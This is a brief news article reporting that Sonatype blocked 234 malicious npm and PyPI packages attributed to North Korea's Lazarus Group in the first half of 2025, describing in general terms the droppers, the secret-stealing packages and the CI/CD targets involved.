Skip to content
FinancecybersecurityTechnology

Malicious Open Source Packages Linked to Lazarus Cyber Spies Affect Over 200 Users

North Korean hackers Lazarus Group accused of cyber-spying, employing publicly accessible software packages in their operations

 and  Administrator
1 min read
Hacked Open Source Software Packages Linked to Lazarus Group Operations Revealed, Affecting Over...
Hacked Open Source Software Packages Linked to Lazarus Group Operations Revealed, Affecting Over 200 Items

Malicious Open Source Packages Linked to Lazarus Cyber Spies Affect Over 200 Users

In the first half of 2025, the security vendor Sonatype blocked 234 unique malware packages on both npm and PyPI, marking a significant cybersecurity threat. These packages, attributed to the notorious Lazarus Group, are believed to have compromised as many as 36,000 victims.

The Lazarus Group, known for its state-sponsored cyber-attacks, has reportedly shifted its strategy, focusing on open-source packages popular in DevOps-heavy organisations or teams with automated Continuous Integration/Continuous Deployment (CI/CD) pipelines.

Once installed, these malicious packages typically execute a multi-stage attack designed to maintain stealth, achieve persistence, and exfiltrate sensitive data. The targets of the Lazarus Group's campaign included build pipelines, developer machines, and cloud-based deployments.

The malicious packages were often disguised as legitimate development libraries, making them easier to install without suspicion. North Korean threat actors are said to have distributed over 200 such packages.

Of the 234 malicious packages detected, 120 were droppers designed to deliver additional malware, while 90 were built for secrets exfiltration. The spread of these potentially harmful packages is thought to be the result of attackers exploiting software supply chain vulnerabilities, notably through techniques like DLL-Side-Loading, allowing malicious code injection and control.

The compromise of a single developer machine or build agent could lead to intellectual property theft, injection of backdoors into production software, lateral movement across the corporate network, and significant reputational damage.

The report attributed the operation to the Lazarus Group based on command-and-control (C2) infrastructure, payload behavior, and campaign timing similar to previous campaigns associated with the group. This incident underscores the need for vigilance in the face of evolving cyber threats and the importance of secure software development practices.

Read also:

Related

Latest